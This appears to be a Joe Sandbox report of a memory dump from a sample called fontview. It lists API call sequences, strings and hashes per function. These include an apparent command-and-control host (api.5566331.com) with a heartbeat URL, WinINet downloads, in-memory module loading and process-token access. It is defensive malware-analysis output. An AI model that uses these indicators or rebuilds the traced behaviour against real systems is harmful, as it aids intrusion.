                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 4104443479-4289949731
                                                      • Opcode ID: 5d4b348e90f931ff1dfb2a7e115a8f775a385ab1ff6a22e6b871e21de8add0f6
                                                      • Instruction ID: 78209948d3c235d0ccee1f15894afd96e8bb927bde5659be2634817a1c8f91c7
                                                      • Opcode Fuzzy Hash: 5d4b348e90f931ff1dfb2a7e115a8f775a385ab1ff6a22e6b871e21de8add0f6
                                                      • Instruction Fuzzy Hash: 59D14C71B00605EFDB26CF48D981A8FB7F9EF48681B24C929E941CB705D731EA50CBA1
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000D17C
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1000D189
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 1000D2B3
                                                      • Sleep.KERNEL32(000003E8), ref: 1000D415
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?), ref: 1000D44D
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D45B
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 1000D463
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D46B
                                                        • Part of subcall function 1000759D: TerminateThread.KERNEL32(?,00000000), ref: 100075D1
                                                        • Part of subcall function 1000759D: CloseHandle.KERNEL32(?), ref: 100075DD
                                                      Strings
                                                      • /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s, xrefs: 1000D2AD
                                                      • api.5566331.com, xrefs: 1000D2DD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$MutexReleaseTime$FileH_prologSleepSystemTerminateThread__aulldiv__time64_rand_sprintf
                                                      • String ID: /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s$api.5566331.com
                                                      • API String ID: 600006260-1514844053
                                                      • Opcode ID: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
                                                      • Instruction ID: 3c7cfe678d53cd4cfc3496ea4f5962675d2c477474c38f7e46c86e78bbea2ba5
                                                      • Opcode Fuzzy Hash: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
                                                      • Instruction Fuzzy Hash: 61A1BB715047409FE720DF25C885B9EB7F8FF84395F000A2EF596821A6DBB1B684CB62
                                                      APIs
                                                      • _malloc.LIBCMT ref: 100321AB
                                                      • InternetOpenA.WININET(okhttp/3.10.0,00000000,00000000,00000000,00000000), ref: 100321D1
                                                      • InternetSetOptionA.WININET(?,00000006,000007D0,00000004), ref: 100321F0
                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,04000000,00000000), ref: 10032209
                                                      • HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 1003224A
                                                      • InternetReadFile.WININET(?,00000000,0000000F,00000001), ref: 10032288
                                                      • InternetCloseHandle.WININET(?), ref: 1003230F
                                                      • _free.LIBCMT ref: 10032343
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$Open$CloseFileHandleHttpInfoOptionQueryRead_free_malloc
                                                      • String ID: $okhttp/3.10.0
                                                      • API String ID: 3353598147-1811919558
                                                      • Opcode ID: fce8fc938c830c2deb24c2e3be88f23622ba28b1854e7f66541364a9db49de4a
                                                      • Instruction ID: 6613a09fe64cb60b8deb12e6b99425ea02e756cb61ab0c2e0afa952f94dfd23c
                                                      • Opcode Fuzzy Hash: fce8fc938c830c2deb24c2e3be88f23622ba28b1854e7f66541364a9db49de4a
                                                      • Instruction Fuzzy Hash: 22616BB1D04249EFEB11DF94CC84B9EBBB9FF44701F104229F515AB290DB756A04CB50
                                                      APIs
                                                      • SetLastError.KERNEL32(000000C1,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B15F
                                                        • Part of subcall function 1001AC3E: SetLastError.KERNEL32(0000000D,1001B18D,?,000001C8), ref: 1001AC44
                                                      • SetLastError.KERNEL32(000000C1,?,?,000001C8), ref: 1001B1A4
                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,000001C8), ref: 1001B1F0
                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B225
                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B23B
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,000001C8), ref: 1001B251
                                                      • HeapAlloc.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B258
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,000001C8), ref: 1001B26B
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,000001C8), ref: 1001B2CE
                                                      • _memmove.LIBCMT ref: 1001B2DD
                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,000001C8), ref: 1001B395
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocErrorLastVirtual$Heap$FreeInfoNativeProcessSystem_memmove
                                                      • String ID:
                                                      • API String ID: 321963714-0
                                                      • Opcode ID: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
                                                      • Instruction ID: 847e78ca93ded4939880e2626f7d24c040fa23cbcd70bd529c665b21de598f23
                                                      • Opcode Fuzzy Hash: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
                                                      • Instruction Fuzzy Hash: E981AB71A00A12ABEB01CF64CD91B6EB7F5FF44384F564058E901DF681E7B4EA91CB90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10011035
                                                        • Part of subcall function 10010E45: __EH_prolog.LIBCMT ref: 10010E4A
                                                      • htonl.WS2_32(?), ref: 10011095
                                                      • htonl.WS2_32(?), ref: 1001109D
                                                      • __time64.LIBCMT ref: 100110A3
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • htonl.WS2_32(00000000), ref: 100110AC
                                                        • Part of subcall function 1001BD49: __EH_prolog.LIBCMT ref: 1001BD4E
                                                        • Part of subcall function 1001BD49: _sprintf.LIBCMT ref: 1001BDBB
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                      • htonl.WS2_32(-0000001C), ref: 100111BD
                                                      • htonl.WS2_32(00000000), ref: 100111C5
                                                      • _malloc.LIBCMT ref: 100111CB
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _memmove.LIBCMT ref: 100111F5
                                                        • Part of subcall function 1001127B: __EH_prolog.LIBCMT ref: 10011280
                                                      • _free.LIBCMT ref: 1001120F
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologhtonl$_memmove$HeapTime$AllocateErrorFileFreeLastSystem__aulldiv__time64_free_malloc_sprintf
                                                      • String ID:
                                                      • API String ID: 3199956779-0
                                                      • Opcode ID: 660d2a1b3b29a4f5e9a680e581c81ab26005bddc8c6ce2b29fc4db2ef802a2d6
                                                      • Instruction ID: 835a1f08fa8a8af1b86e20a3026624fe9f93954c30b8a38d983207ef737a5809
                                                      • Opcode Fuzzy Hash: 660d2a1b3b29a4f5e9a680e581c81ab26005bddc8c6ce2b29fc4db2ef802a2d6
                                                      • Instruction Fuzzy Hash: 63616D75D00258EFDF15DFA4D891AEEBBB8EF54300F10845AF419A7282DB34AA49CF51
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100151FC
                                                      • GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2
                                                      • GetModuleHandleA.KERNEL32(00000000,1005D0FC,?,1005D0FC,00000000,?,000001C8,?), ref: 1001530A
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,000001C8,?), ref: 1001531D
                                                      • _strrchr.LIBCMT ref: 1001532C
                                                        • Part of subcall function 1001C0C6: __time64.LIBCMT ref: 1001C0CD
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0DF
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0F0
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                        • Part of subcall function 10009155: _memcmp.LIBCMT ref: 10009180
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Module$FileH_prologHandleNamePathTemp__time64_memcmp_memmove_strrchr
                                                      • String ID: Windows\$Windows\System32\$c:\
                                                      • API String ID: 2592937688-2965336455
                                                      • Opcode ID: 0229697d2f4289d93245c8bb9077e40a1819859923537374226eb0cb659c5bc9
                                                      • Instruction ID: 20a427f31c4f15e36cfe53c2b189bc403b5a0b5ac72e4174fe82cc10685258e7
                                                      • Opcode Fuzzy Hash: 0229697d2f4289d93245c8bb9077e40a1819859923537374226eb0cb659c5bc9
                                                      • Instruction Fuzzy Hash: 5C51D17650010ABAEB15EB60DC5AEFF336EDF84290F10411AF6159B096EF74EE898620
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100104E9
                                                        • Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 1001052F
                                                      • Process32First.KERNEL32(00000000,?), ref: 1001054E
                                                      • lstrcmpA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?), ref: 10010587
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 100105A7
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 100105B5
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?), ref: 100105E5
                                                      • OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?), ref: 100105F2
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 100105FB
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseH_prologHandleOpenProcessProcess32$CreateFirstNextSnapshotTokenToolhelp32lstrcmp
                                                      • String ID:
                                                      • API String ID: 1332722264-0
                                                      • Opcode ID: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
                                                      • Instruction ID: b62764b0414d32b709b223facb62bba5ffd3a5644e312f6732ebb2b98ad689ba
                                                      • Opcode Fuzzy Hash: 4a41a6bdfa66efb0e501efd1c46497dcc14bd6281253315d37dc36e56c92a601
                                                      • Instruction Fuzzy Hash: EA316D75A00228AFEB10EFA4CC99EEEBB79FF04394F004469F51696191DF74AB44CA60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000456D
                                                      • __wfopen_s.LIBCMT ref: 100045DC
                                                      • CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000080,00000000), ref: 100045FB
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 10004625
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000462C
                                                      • __fread_nolock.LIBCMT ref: 1000465A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateH_prologHandleSize__fread_nolock__wfopen_s
                                                      • String ID: Get file size failed!
                                                      • API String ID: 2615374186-588257513
                                                      • Opcode ID: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
                                                      • Instruction ID: 0f310d6fd00b9f6b04008b82b283a21e80cb63aa65aa8e7d48c89f91d565bf33
                                                      • Opcode Fuzzy Hash: e0b5637183cde497578a0dcd03e8d4d4129d0fda55b36cff8f3b76bf11604ced
                                                      • Instruction Fuzzy Hash: 0041E3B6900608BFEB12DBA4CC46FEEB779EF05351F108026FA04F6191DF746A448B66
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 100263A4
                                                      • connect.WS2_32(?,00000000,0000001C), ref: 100263CC
                                                      • WSAGetLastError.WS2_32(?,10026009,?,00000000), ref: 100263DF
                                                      • connect.WS2_32(?,00000000,0000001C), ref: 1002640F
                                                      • WSAEventSelect.WS2_32(?,?,00000023), ref: 10026422
                                                      • SetLastError.KERNEL32(00000000,?,10026009,?,00000000), ref: 1002643D
                                                      • GetLastError.KERNEL32(?,10026009,?,00000000), ref: 10026452
                                                      • WSASetLastError.WS2_32(00000000,?,10026009,?,00000000), ref: 10026463
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EventSelectconnect
                                                      • String ID:
                                                      • API String ID: 371153081-0
                                                      • Opcode ID: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
                                                      • Instruction ID: 52ca4863fcde4b83e53eff6488bf04bcb13c55dc1b2842da82c1cb5a4742651c
                                                      • Opcode Fuzzy Hash: 54afe04ce1d9cf9f21d3b39e61d792278d7fa797bcda66940024414513743954
                                                      • Instruction Fuzzy Hash: 9421C6302006119BF7249F60EC89B6A77AAEF44721F504628F596C65E0C7B6DC949B60
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • _wcscmp.LIBCMT ref: 1004437D
                                                      • _wcscmp.LIBCMT ref: 10044393
                                                      • ___lc_wcstolc.LIBCMT ref: 100443BF
                                                      • ___get_qualified_locale.LIBCMT ref: 100443E4
                                                        • Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A7CD
                                                        • Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A7E6
                                                        • Part of subcall function 1004A78D: _TranslateName.LIBCMT ref: 1004A801
                                                        • Part of subcall function 1004A78D: _GetLocaleNameFromLangCountry.LIBCMT ref: 1004A817
                                                        • Part of subcall function 1004A78D: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,100443E9,?,?,?,?,00000004,?,00000000), ref: 1004A86B
                                                      • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 1004447B
                                                      • _memmove.LIBCMT ref: 10044531
                                                      • __invoke_watson.LIBCMT ref: 10044586
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__amsg_exit__getptd_noexit__invoke_watson_memmove
                                                      • String ID:
                                                      • API String ID: 3739364018-0
                                                      • Opcode ID: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
                                                      • Instruction ID: ff94cb8106a5d527924046aadc737bfe104d0811a886c723f0991959bc7079a2
                                                      • Opcode Fuzzy Hash: 780446970f9145ecf884e25bb577454b131f8547c3ee739ad5612f4a18112756
                                                      • Instruction Fuzzy Hash: 76717E76900656ABDB21DF65CC41BEE77B9EF45350F2204B6FD08E6142EF309E808B99
                                                      APIs
                                                      • _memmove.LIBCMT ref: 100162B8
                                                      • _memmove.LIBCMT ref: 100162E5
                                                      • _memmove.LIBCMT ref: 1001631B
                                                      • _memmove.LIBCMT ref: 10016334
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1001636D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                      • String ID: deque<T> too long
                                                      • API String ID: 279611364-309773918
                                                      • Opcode ID: d7780ab7d97e8d5383d8776bb70a8435f98cd7e962088065fa713099eaab99b4
                                                      • Instruction ID: 784c8dabccd0a6210e0a94bf7cb842966d568d9ccd1820f8fb5e6c9047be17b7
                                                      • Opcode Fuzzy Hash: d7780ab7d97e8d5383d8776bb70a8435f98cd7e962088065fa713099eaab99b4
                                                      • Instruction Fuzzy Hash: 7741F776A00A15AFCB14CE69CD8165EB7F5EF44260B11863CEC25EB780DB31FE54C690
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 10026482
                                                      • _free.LIBCMT ref: 100264B5
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _malloc.LIBCMT ref: 100264FC
                                                      • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000000FF,00000000), ref: 10026544
                                                      • WSAGetLastError.WS2_32 ref: 10026580
                                                        • Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?), ref: 10026961
                                                        • Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 100269C0
                                                        • Part of subcall function 10026910: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,B7A91B76,?,76A85E10,7591DF10), ref: 10026A19
                                                        • Part of subcall function 10026910: EnterCriticalSection.KERNEL32(?,00000000,B7A91B76,?,76A85E10,7591DF10), ref: 10026A2B
                                                        • Part of subcall function 10026910: LeaveCriticalSection.KERNEL32(?), ref: 10026A6A
                                                      • GetCurrentThreadId.KERNEL32 ref: 100265A3
                                                      • GetCurrentThreadId.KERNEL32 ref: 100265C7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
